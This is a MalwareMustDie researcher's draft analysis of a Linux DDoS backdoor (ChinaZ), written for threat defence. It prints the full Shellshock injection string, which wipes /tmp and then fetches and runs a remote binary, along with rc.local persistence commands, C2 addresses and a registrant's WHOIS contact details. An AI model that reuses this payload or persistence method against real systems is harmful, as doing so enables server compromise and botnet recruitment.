#MalwareMustDie! Quick/draft report on China DDoS Backdoor Malware: Linux.ChinaZ.DDoS (UPADATE) The official announce (with pics etc) is here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3682 Sample : 9521 (ELF) MD5 : b7e3ca05806aa99cad9d3768ff90f1d9 SHA256 : 92fd1971f7ac512d096821a4bf8553bc13d1c478680999dd2e15400fe8973793 VT: https://www.virustotal.com/en/file/92fd1971f7ac512d096821a4bf8553bc13d1c478680999dd2e15400fe8973793/analysis/ ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.26, stripped ELF reverser: @unixfreaxjp PE reverser/found by: @benkow // [UPDATE] infection vector: ShellShock (thanks to benkow) [13/Jan/2015:06:07:18 +0100] "GET / HTTP/1.1" 200 311 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh; chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" // [UPDATE] Shellshock infector (ck.exe) is a windows based application with the low detection: VT: https://www.virustotal.com/en/file/ae677c48a6fdd79129bde3b5321bc4c3cd95c20e63302ad98afadeef64514d5f/analysis/ PoC of windows shellshock infector/scanner: .rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China' .rdata:0057D808 ; DATA XREF: StartAddress+124o .rdata:0057D808 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm' .rdata:0057D808 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm' .rdata:0057D808 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru' .rdata:0057D808 db 'n.sh;/tmp/Run.sh"',0 // autostart installation.. 0x0804B580 sub_804B580 proc near 0x0804B5CC mov dword ptr [esp], offset aEtcRc_local ; "/etc/rc.local" 0x0804B5D3 call sub_804B550 ; //checks the file..(fstat etc..) 0x0804B5D8 mov [esp], ebx 0x0804B685 mov dword ptr [esp+4], offset aSedIESDEtcRc_l ; "sed -i -e '/%s/d' /etc/rc.local" ; decoded strings ==> sed -i -e '/exit/d' /etc/rc.local <===NEW (...) 0x0804B6A5 mov dword ptr [esp+4], offset aSedIE2ISSEtcRc ; "sed -i -e '2 i%s/%s' /etc/rc.local" ; decoded strings ==> sed -i -e '2 i//ChinaZ' /etc/rc.local <===NEW (...) 0x0804B6BE mov dword ptr [esp], offset aEtcRc_local ; "/etc/rc.local" // Snapshots: pic.twitter.com/dc0cUiJOx0 <=== NEW https://twitter.com/unixfreaxjp/status/555037345397764096 https://twitter.com/unixfreaxjp/status/554993736493445120 https://twitter.com/unixfreaxjp/status/555018427434151936 // CNC Backdoor data: // (1)hostname, (2)IP, (3)port, (4)Initial trafic SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL) SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16]) SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16) SYSCALL5D, write(3, "\0\0\0\0Linux3.2.0-4-686-pae\0\275w\267\0\1\0\0"..., 168) = 168 00000000 00 00 00 00 4c 69 6e 75 78 33 2e 32 2e 30 2d 34 ....Linu x2.6.2-4 00000010 2d 36 38 36 2d 70 61 65 00 1d 7a b7 00 01 00 00 -686.... ..z..... 00000020 48 31 d6 09 48 31 d6 09 00 00 00 00 64 1c 7a b7 H1..H1.. ....d.z. 00000030 00 00 00 00 a0 2e d6 09 90 71 e4 b6 da a4 d0 b6 ........ .q...... 00000040 ff ff ff ff 31 20 2a 20 32 35 33 31 4d 48 7a 00 ....1 * 2531MHz. 00000050 40 1c 7a b7 40 8c 0a 08 58 30 d6 09 d0 32 d6 09 @.z.@... X0...2.. 00000060 01 00 00 00 31 30 30 32 20 4d 42 00 80 80 e4 b6 ....1002 MB..... 00000070 98 23 d6 09 ff ff ff ff 38 98 d0 b6 da a4 d0 b6 .#...... 8....... 00000080 05 00 00 00 56 49 50 00 40 8c 0a 08 58 30 d6 09 ....VIP. @...X0.. 00000090 00 33 d6 09 01 00 00 00 05 00 00 00 00 00 00 00 .3...... ........ 000000A0 88 a1 d0 b6 6e 20 01 00 ....n .. // CNC information... $ my_lookup aa.gm352.com aa.gm352.com. 300 IN A 121.12.173.173 gm352.com. 3600 IN NS ns4.he.net. gm352.com. 3600 IN NS ns3.he.net. gm352.com. 3600 IN NS ns2.he.net. gm352.com. 3600 IN NS ns1.he.net. gm352.com. 3600 IN NS ns5.he.net. $ mycnccheck 121.12.173.173:9521 Connection to 121.12.173.173 9521 port [tcp/*] succeeded! IPv4 TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED) // IP origins, Domains.. $ echo 121.12.173.173 | bash origin.sh Loc: ASN: 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H | SHENZHENSHILUOHUQUHEPINGLUYIFENGGUANGCHANGCZUO32H Domain Name: GM352.COM Registrar: GODADDY.COM, LLC Whois Server: whois.godaddy.com Referral URL: http://registrar.godaddy.com Name Server: NS1.HE.NET Name Server: NS2.HE.NET Name Server: NS3.HE.NET Name Server: NS4.HE.NET Name Server: NS5.HE.NET Status: clientDeleteProhibited Status: clientRenewProhibited Status: clientTransferProhibited Status: clientUpdateProhibited Updated Date: 26-sep-2014 Creation Date: 19-nov-2012 Expiration Date: 19-nov-2015 >>> Last update of whois database: Tue, 13 Jan 2015 15:46:34 GMT <<< Registry Registrant ID: Registrant Name: Yang Hui Registrant Organization: Registrant Street: Baoanqu,Longhua,Dalangcunwei Registrant City: Shenzhen Registrant State/Province: Guangdong Registrant Postal Code: 518131 Registrant Country: Djibouti Registrant Phone: +86.075528176958 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: taosfa@hotmail.com ---- #MalwareMustDie!! Huzzah!